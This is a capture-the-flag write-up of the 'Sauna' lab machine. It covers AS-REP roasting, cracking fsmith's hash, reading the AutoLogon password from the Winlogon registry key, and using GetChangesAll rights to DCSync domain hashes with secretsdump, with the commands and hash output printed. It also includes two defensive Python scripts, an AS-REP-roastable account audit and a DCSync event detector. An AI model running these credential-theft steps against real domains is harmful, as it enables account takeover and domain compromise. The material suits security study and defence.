This box starts off with port 80 open. Enumerating the website turns up employee names on one of its pages. Kerberoasting proves successful, as we retrieve the hash of user fsmith. Once the hash is cracked we are able to gain access to the machine. Working through the privilege escalation steps, we come across cached credentials used by WinLogon, found in the registry for user svc_loanmanager; we retrieve the credentials with PowerShell. After looking at the user in BloodHound, we find the user has GetChangesAll on the domain. This allows the user to DCSync and dump all the hashes for the domain.

Initial Nmap

PORT     STATE SERVICE       REASON          VERSION                                   
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-10 21:23:01Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

From the looks of the scan, we're dealing with Active Directory.

Port 80 is open as well, maybe ADCS. Let's see.

HTTP - EgotisticalBanking…funny

So we look through the website; most of it is static .html, so not very useful. Yet there is an About Us section, which lists some people and their names. We can gather these and try them.

$ curl -s http://10.10.10.175/about.html | html2text | grep -i Fergus -A5 > users.lst


Now we need to spice it up a bit: we can create a list of potential username formats from those names with username-anarchy.

$ username-anarchy -i users.lst > users.list

Kerberoasting the lot of 'em

We can see if any usernames are valid.

$ kerbrute userenum -d egotistical-bank.local --dc 10.10.10.175 users.list
<SNIP>
2025/05/10 12:05:48 > Using KDC(s):
2025/05/10 12:05:48 > 10.10.10.175:88

2025/05/10 12:05:48 > [+] VALID USERNAME: fsmith@egotistical-bank.local

Let's see if fsmith has "Do not require Kerberos preauthentication" set; we might get an easy win.

$ GetNPUsers.py -dc-ip 10.10.10.175 'egotistical-bank.local/fsmith' -outputfile ./fsmith.hash
Name    MemberOf                                                            PasswordLastSet             LastLogon                   UAC
------  ------------------------------------------------------------------  --------------------------  --------------------------  --------
FSmith  CN=Remote Management Users,CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL  2020-01-23 10:45:19.047096  2025-05-10 19:10:08.254342  0x410200

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:<SNIP>

This does get us user fsmith's hash. We can crack it with hashcat (-m 18200) and get a cleartext password. After that we run a BloodHound dump and see what privileges our user has on the box.
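The UAC column in the GetNPUsers.py output above (0x410200) is what tells you why the hash came back. As an added example, not code from the original writeup, here is a small audit helper that decodes that userAccountControl value and flags any enabled account with "Do not require Kerberos preauthentication" set; the table it parses is a constructed sample in the same layout as the tool's output.

```python
from __future__ import annotations

# Added example: decode the userAccountControl (UAC) value GetNPUsers.py prints
# for each account and flag AS-REP-roastable ones, i.e. enabled accounts with
# DONT_REQ_PREAUTH ("Do not require Kerberos preauthentication") set.
# Bit values are the documented userAccountControl flags.
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x000002
DONT_REQ_PREAUTH = 0x400000


def decode_uac(value: int) -> list[str]:
    """Names of the known UAC bits set in value, in ascending bit order."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(uac: int) -> bool:
    """True for an enabled account that does not require pre-authentication."""
    return bool(uac & DONT_REQ_PREAUTH) and not (uac & ACCOUNTDISABLE)


def parse_getnpusers_table(text: str) -> dict[str, int]:
    """Parse the 'Name ... UAC' table into {name: uac}; the UAC column is hex."""
    accounts: dict[str, int] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[-1].lower().startswith("0x"):
            accounts[parts[0]] = int(parts[-1], 16)
    return accounts


def audit(text: str) -> dict[str, list[str]]:
    """Map each roastable account to its decoded flags, for a triage report."""
    return {name: decode_uac(uac)
            for name, uac in parse_getnpusers_table(text).items()
            if asrep_roastable(uac)}


# Constructed sample: FSmith's UAC value mirrors the writeup; the others are made up.
SAMPLE_TABLE = """\
Name    MemberOf                    PasswordLastSet  LastLogon   UAC
------  --------------------------  ---------------  ----------  --------
FSmith  CN=Remote Management Users  2020-01-23       2025-05-10  0x410200
JDoe    -                           2020-01-23       2025-05-10  0x10200
OldSvc  -                           2019-06-01       -           0x410202
"""

if __name__ == "__main__":
    for name, flags in audit(SAMPLE_TABLE).items():
        print(f"[!] {name} is AS-REP roastable: {', '.join(flags)}")
```

OldSvc carries the same DONT_REQ_PREAUTH bit but is disabled, so it is reported as not roastable; the fix on the defensive side is clearing that bit on FSmith, not just rotating the password.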

--HashCat--
$ hashcat -a 0 -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt

--BloodHound--
$ nxc ldap egotistical-bank.local -u fsmith -p <SNIP> --bloodhound -c All --dns-server 10.10.10.175

BloodHound the big Angry Dog

Looking at our user fsmith, we don't have anything useful to escalate our privileges, but we are part of the Remote Management Users group. That being a start, we can make our way onto the box.

We’ll come back when we have more!!

Evil things are happening

Once on the box, we do some basic enumeration (e.g. net tools, uncommon installed programs, checking the registry, and services). We happen to find an AutoLogon configured for user svc_loanmanager.

*Evil-WinRM* PS C:\Users\FSmith\Documents> Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\' -Name "DefaultUserName"


DefaultUserName : EGOTISTICALBANK\svc_loanmanager
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName : Winlogon
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry

We can actually obtain the password using the same command; just specify DefaultPassword for the Name parameter.

*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\' -Name "DefaultPassword"


DefaultPassword : <SNIP>
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName : Winlogon
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry

Back to the Future at least to BloodHound

Looking for this user in BloodHound, we don't find svc_loanmanager, but we do see svc_loanmgr. His privileges are much more dangerous: he has GetChangesAll, allowing our user to DCSync with the domain and dump hashes.
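From the blue-team side, a DCSync by a principal like svc_loanmgr is visible on the domain controller as Security event 4662 with the replication extended rights in its Properties field. As an added example that is not part of the original writeup, this detector flags such events when the requester is not a DC machine account; the GUIDs are the documented extended-right identifiers, and the event records are constructed (only the host and domain names come from the writeup).

```python
from __future__ import annotations
import re

# Added example: flag DCSync-style replication requests in Windows Security
# event 4662 records. A principal that is not a domain controller exercising
# the replication extended rights is exactly what GetChangesAll lets
# svc_loanmgr do. The event records below are constructed samples.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)


def is_dc_account(account: str) -> bool:
    """DCs replicate with their machine account, whose sAMAccountName ends in '$'."""
    return account.rsplit("\\", 1)[-1].endswith("$")


def replication_rights(properties: str) -> list[str]:
    """Names of the replication extended rights among the GUIDs in Properties."""
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(properties) if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events: list[dict]) -> list[dict]:
    """One alert per 4662 event where a non-DC principal requested replication."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        subject = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}"
        if rights and not is_dc_account(subject):
            alerts.append({"subject": subject, "rights": rights})
    return alerts


# Constructed sample events: the DC's own replication (benign), the DCSync by
# svc_loanmgr (alert), and an unrelated 4662 on an object of the user class.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "SAUNA$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "svc_loanmgr",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "FSmith",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"[!] possible DCSync by {a['subject']}: {', '.join(a['rights'])}")
```

The complementary preventive check is reviewing the domain object's ACL for those same extended rights granted to anything other than Domain Controllers, Enterprise Domain Controllers, Administrators and the SYSTEM account; the detector above is the last line, not the first.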

Dumping everything

Finally, with secretsdump we collect the Administrator hash.

secretsdump.py -dc-ip 10.10.10.175 'egotistical-bank.local/svc_loanmgr@egotistical-bank.local'
<SNIP>
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<SNIP>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:<SNIP>:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:<SNIP>:::
<SNIP>